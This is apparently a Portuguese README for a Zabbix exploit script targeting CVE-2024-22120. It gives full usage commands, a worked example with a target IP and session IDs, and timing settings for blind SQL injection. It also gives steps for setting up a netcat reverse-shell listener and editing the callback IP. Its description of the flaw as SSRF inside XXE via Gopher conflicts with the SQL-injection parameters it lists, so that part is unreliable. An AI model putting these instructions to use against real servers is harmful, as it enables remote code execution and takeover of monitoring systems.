
Este é o meu exploit para CVE-2024-22120, que envolve uma vulnerabilidade SSRF dentro de um XXE com um payload Gopher.
python exploit.py --ip <Zabbix_IP> --sid <LowPrivileged_SID> --hostid <HostID> --phpsessid <PHPSESSID> --false_time <FalseTime> --true_time <TrueTime>
Você identificou um servidor Zabbix rodando no IP 192.168.1.100 e tem acesso a um usuário de baixo privilégio com os seguintes detalhes:
sid): d82bf6715e1d3c1f25hostid): 10107phpsessid): a4g7f48d9j3r7h8s9gVocê deseja explorar a vulnerabilidade de RCE usando este script.
python exploit.py --ip 192.168.1.100 --sid d82bf6715e1d3c1f25 --hostid 10107 --phpsessid a4g7f48d9j3r7h8s9g --false_time 1 --true_time 3
--ip 192.168.1.100: O endereço IP do servidor Zabbix.--sid d82bf6715e1d3c1f25: O ID de sessão de um usuário de baixo privilégio.--hostid 10107: O ID de um host que o usuário de baixo privilégio pode acessar.--phpsessid a4g7f48d9j3r7h8s9g: O ID da sessão PHP usado para autenticar requisições.--false_time 1: Tempo em segundos para esperar no caso de um palpite errado durante a injeção SQL (padrão é 1 segundo).--true_time 3: Tempo em segundos para esperar no caso de um palpite correto durante a injeção SQL (padrão é 3 segundos).10.0.46.27:5555 no script).Certifique-se de que sua máquina esteja ouvindo na porta especificada (5555 no script) para capturar o reverse shell. Você pode usar o netcat para isso:
nc -lvnp 5555
Substitua o IP 10.0.46.27 e a porta 5555 na função CreateScript pelo seu próprio IP e porta desejada para receber o reverse shell.